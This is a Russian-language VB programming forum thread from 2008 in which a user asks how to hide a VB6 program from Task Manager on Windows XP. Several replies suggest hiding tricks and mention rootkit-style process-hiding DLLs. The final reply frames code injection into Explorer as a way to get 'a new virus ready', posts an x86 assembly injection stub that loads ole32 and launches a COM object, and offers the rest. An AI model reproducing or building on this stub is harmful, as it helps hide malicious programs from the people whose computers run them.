Visual Basic, .NET, ASP, VBScript
Новости | Примеры | Библиотека кодов | НеЧаВо | VBA | Справочник по VB | Справочник по WinAPI | ActiveX контролы | Статьи по VB | Мастерская разработчика | Форум VBNet | Яndex bar! | Голосование | Полезные программы | Магазин VBNet | Рассылка | Конкурсы | Юмор | Чат | Реклама на VBNet | Автора! | Ссылки | Бета-тестирование | Послать пример на сайт
 

   
   
     

Форум - Общий форум

Страница: 1 |

 

  Вопрос: Как скрыть приложение от Task Manager Добавлено: 19.11.08 19:40  

Автор вопроса:  Svsit
Кто знает как скрыть приложение на VB6 от "Диспетчера задач" (Task Manager). Пока нашел только для 9х платформы, а необходимо для Windows XP?

Ответить

  Ответы Всего ответов: 9  

Номер ответа: 1
Автор ответа:
 Boconon



ICQ: 216390557 

Вопросов: 25
Ответов: 71
  Web-сайт: microsoft.com
 Профиль | | #1 		Добавлено: 19.11.08 20:15
  1. app.taskvisible = false

это скроет из списка задач
...а чтобы скрыть из процессов есть один способ...
но по-моему не должно его новичкам, которые только сегодня зарегались и несут самые зловредные намерения его давать...
и охота вири писать?

Ответить

Номер ответа: 2
Автор ответа:
 Winand



Вопросов: 87
Ответов: 2795
  Web-сайт: winandfx.narod.ru
 Профиль | | #2 		Добавлено: 20.11.08 01:33
Я придумал как. При открытии таск-менеджера, нужно устанавливать его окну нулевую прозрачность. не правда ли гениально?=)

Ответить

Номер ответа: 3
Автор ответа:
 EROS



Вопросов: 58
Ответов: 4255
  Профиль | | #3 Добавлено: 20.11.08 08:16
не правда ли гениально?

Ну если развивать твою мысль дальше, то можно с таким же успехом установить соответствующмй размер.. скажем 1х1 px

Ответить

Номер ответа: 4
Автор ответа:
 Павел



Вопросов: 1
Ответов: 7
  Профиль | | #4 Добавлено: 20.11.08 13:08
Какой смысл давать пользователю понят что у него на компе чтото есть, глупо, особенно если ты не хочешь ему подсказать о присутствии скрытой программы. А вот убрать из менеджера можно при помощи старых добрых API функций. Я даже гдето в нете видел пример.

Ответить

Номер ответа: 5
Автор ответа:
 Winand



Вопросов: 87
Ответов: 2795
  Web-сайт: winandfx.narod.ru
 Профиль | | #5 		Добавлено: 20.11.08 15:13
а от процесс эксплорера можно скрыть?

Ответить

Номер ответа: 6
Автор ответа:
 Sharp


Лидер форума

ICQ: 216865379 

Вопросов: 106
Ответов: 9979
  Web-сайт: sharpc.livejournal.com
 Профиль | | #6 		Добавлено: 20.11.08 16:19
Можно. А вот от Rootkit Unhooker довольно тяжело.

Ответить

Номер ответа: 7
Автор ответа:
 AndreyMp



ICQ: 237822510 

Вопросов: 28
Ответов: 1182
  Профиль | | #7 Добавлено: 26.11.08 08:37
Кажется на сорцах когда то выкладывали dll с помощью которой прога скрывается из списка процессов, но автора не помню (вроде Скинер, или Алиса).

Ответить

Номер ответа: 8
Автор ответа:
 werber



Вопросов: 71
Ответов: 112
  Web-сайт: www.werbersoft.ru
 Профиль | | #8 		Добавлено: 26.11.08 18:19
Эту dll-ку как то называли Fantom_<<число>>. Если я её не забыл ещё...

Ответить

Номер ответа: 9
Автор ответа:
 Kardinal



ICQ: 360041513 

Вопросов: 1
Ответов: 164
  Web-сайт: kg7.ru
 Профиль | | #9 		Добавлено: 02.12.08 18:13
Так зачем скрывать встраиваем код в другую программу (Експлорер и т.п.) и новый вирус готов...
Там правда кусок кода на асемблере, но основная программа может быть на VB

  1.  
  2. BITS 32
  3.  
  4. ;Здесь будет лежать адрес страницы, в которую загружен этот файл
  5. mov ebp,0
  6. jmp Run
  7.  
  8. ;Здесь будут лежать адреса системных API-функций, которые мы будем использовать
  9. ObjectCLSID dd 0, 0, 0, 0
  10. InterfaceIID dd 0, 0, 0, 0
  11. LoadLibrary dd 00
  12. ExitThread dd 0
  13. CoCreateInstance dd 0
  14. CoInitialize dd 0
  15. CoUninitialize dd 0
  16. OLE32DLL db "ole32.dll",0
  17.  
  18. ;Отсюда начинается наша программа
  19. Run:
  20.  
  21. mov edi,esp  ;Сохранаяем значение esp в edi
  22. push dword 0 ;Выделяем место в стеке под наш объект
  23.  
  24. mov eax,ebp               ;
  25. add eax,OLE32DLL          ;
  26. push eax                  ;==>LoadLibrary("ole32.dll")
  27. call [ebp+LoadLibrary]    ;
  28.  
  29. push dword 0              ;
  30. call [ebp+CoInitialize]   ;==>CoInitialize(0)
  31.  
  32.  
  33. push edi                       ;
  34. mov eax,ebp                    ;
  35. add eax,InterfaceIID           ;
  36. push eax                       ;
  37. push dword 1                   ;==>CoCreateInstance(ObjectCLSID,0,1,InterfaceIID,ObjectPtr)
  38. push dword 0                   ;
  39. mov eax,ebp                    ;
  40. add eax,ObjectCLSID            ;
  41. push eax                       ;
  42. call [ebp+CoCreateInstance]    ;
  43.  
  44. mov ecx,eax    ;
  45. jecxz Continue ;==>Выходим, если не удалось создать объект
  46. jmp Exit       ;
  47.  
  48. Continue:
  49. mov ebx,[edi]  ;Сохраняем в ebx адрес нашего объекта
  50.  
  51. mov esi,[ebx] ;Теперь в esi указатель на vtable
  52.  
  53. push ebx      ;
  54. call [esi+28] ;==>ebx->Main()
  55.  
  56. push ebx      ;
  57. call [esi+8]  ;==>ebx->Release()
  58.  
  59. call [ebp+CoUninitialize] ;==>CoUninitialize()
  60.  
  61. Exit:
  62. push dword 0          ;
  63. call [ebp+ExitThread] ;==>ExitThread(0)
  64.  



Кого интересует могу кинуть продолжение...

Ответить

Страница: 1 |

Поиск по форуму



© Copyright 2002-2011 VBNet.RU | Пишите нам